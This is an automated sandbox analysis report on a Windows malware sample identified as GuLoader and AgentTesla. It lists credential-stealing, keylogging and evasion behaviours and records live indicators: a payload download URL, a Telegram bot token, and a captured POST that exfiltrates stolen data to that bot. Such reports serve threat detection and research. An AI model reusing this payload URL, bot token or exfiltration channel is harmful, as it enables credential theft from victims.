Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 623387
MD5: 2beb53482de8f6a713deb6fa9f9e7267
SHA1: 0959ea9b1697d980da699f8375f91ca1df8e0f56
SHA256: 7ac7845621113c87e927eb2b582af6f1809e4866e4ee0f089dd1c6ab0042dd27
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Contains functionality to enumerate device drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://msdvc.com/oluwa_RcQBQnZSyJ230.bin"}
Source: conhost.exe.8960.7.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "765471673", "Chat URL": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument"}
Source: CasPol.exe.8436.6.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendMessage"}
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 26% Perma Link
Source: file.exe ReversingLabs: Detection: 21%
Multi AV Scanner detection for domain / URL
Source: msdvc.com Virustotal: Detection: 5% Perma Link
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20707A18 CryptUnprotectData, 6_2_20707A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20708018 CryptUnprotectData, 6_2_20708018
Uses 32bit PE files
Source: file.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 119.18.54.23:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49749 version: TLS 1.2
Source: file.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb, source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: MsMpCom.pdb source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: Binary string: MsMpCom.pdbGCTL source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C13
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040683D FindFirstFileW,FindClose, 1_2_0040683D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542fHost: api.telegram.orgContent-Length: 1026Expect: 100-continueConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: msdvc.comCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://VrxAgw.com
Source: CasPol.exe, 00000006.00000002.9109123482.000000001D620000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: file.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%t-
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000006.00000002.9084920073.0000000001092000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.5392527483.0000000001092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocumentdocument-----
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.4395944498.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9108808385.000000001D606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1ktMAcOA2o.net
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1ktMAcOA2o.nett-
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/j
Source: CasPol.exe, 00000006.00000003.5393803213.000000000106A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: msdvc.com
Source: global traffic HTTP traffic detected: GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: msdvc.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000006.00000002.9107606876.000000001D521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: unknown HTTP traffic detected: POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542fHost: api.telegram.orgContent-Length: 1026Expect: 100-continueConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 119.18.54.23:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49749 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_004056A8
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00406BFE 1_2_00406BFE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF 1_2_70AC1BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BB61C 1_2_033BB61C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFAFD 1_2_033AFAFD
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AEDE0 1_2_033AEDE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCC1C 1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B573A 1_2_033B573A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFF06 1_2_033AFF06
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BDB04 1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B175E 1_2_033B175E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BF35C 1_2_033BF35C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1356 1_2_033B1356
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2F4A 1_2_033B2F4A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2BBE 1_2_033B2BBE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2B8D 1_2_033B2B8D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B138C 1_2_033B138C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCB81 1_2_033BCB81
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5BFF 1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B53CE 1_2_033B53CE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B57C6 1_2_033B57C6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AEE3E 1_2_033AEE3E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1632 1_2_033B1632
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B562F 1_2_033B562F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2E62 1_2_033B2E62
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B12AA 1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B629A 1_2_033B629A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B568A 1_2_033B568A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFE86 1_2_033AFE86
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B22FB 1_2_033B22FB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B4EE7 1_2_033B4EE7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B591F 1_2_033B591F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2D7E 1_2_033B2D7E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B156E 1_2_033B156E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFD46 1_2_033AFD46
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B61A9 1_2_033B61A9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2DFC 1_2_033B2DFC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFDEE 1_2_033AFDEE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B61CF 1_2_033B61CF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFC1E 1_2_033AFC1E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1412 1_2_033B1412
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1815 1_2_033B1815
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5876 1_2_033B5876
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BE04B 1_2_033BE04B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFC91 1_2_033AFC91
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2CFE 1_2_033B2CFE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BD0E8 1_2_033BD0E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B50E8 1_2_033B50E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B14C3 1_2_033B14C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A9890 6_2_1D2A9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A6B63 6_2_1D2A6B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2AA160 6_2_1D2AA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A9548 6_2_1D2A9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEBFA8 6_2_1FCEBFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEF548 6_2_1FCEF548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCE3D88 6_2_1FCE3D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEC528 6_2_1FCEC528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20630040 6_2_20630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063BEF0 6_2_2063BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20638BE8 6_2_20638BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_206337A0 6_2_206337A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_206364B0 6_2_206364B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063D508 6_2_2063D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20632320 6_2_20632320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063373F 6_2_2063373F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20703018 6_2_20703018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070AD36 6_2_2070AD36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207055F8 6_2_207055F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207005A9 6_2_207005A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070DED0 6_2_2070DED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070EF70 6_2_2070EF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070CF20 6_2_2070CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207054F8 6_2_207054F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070D2C0 6_2_2070D2C0
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: file.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\file.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Uses 32bit PE files
Source: file.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
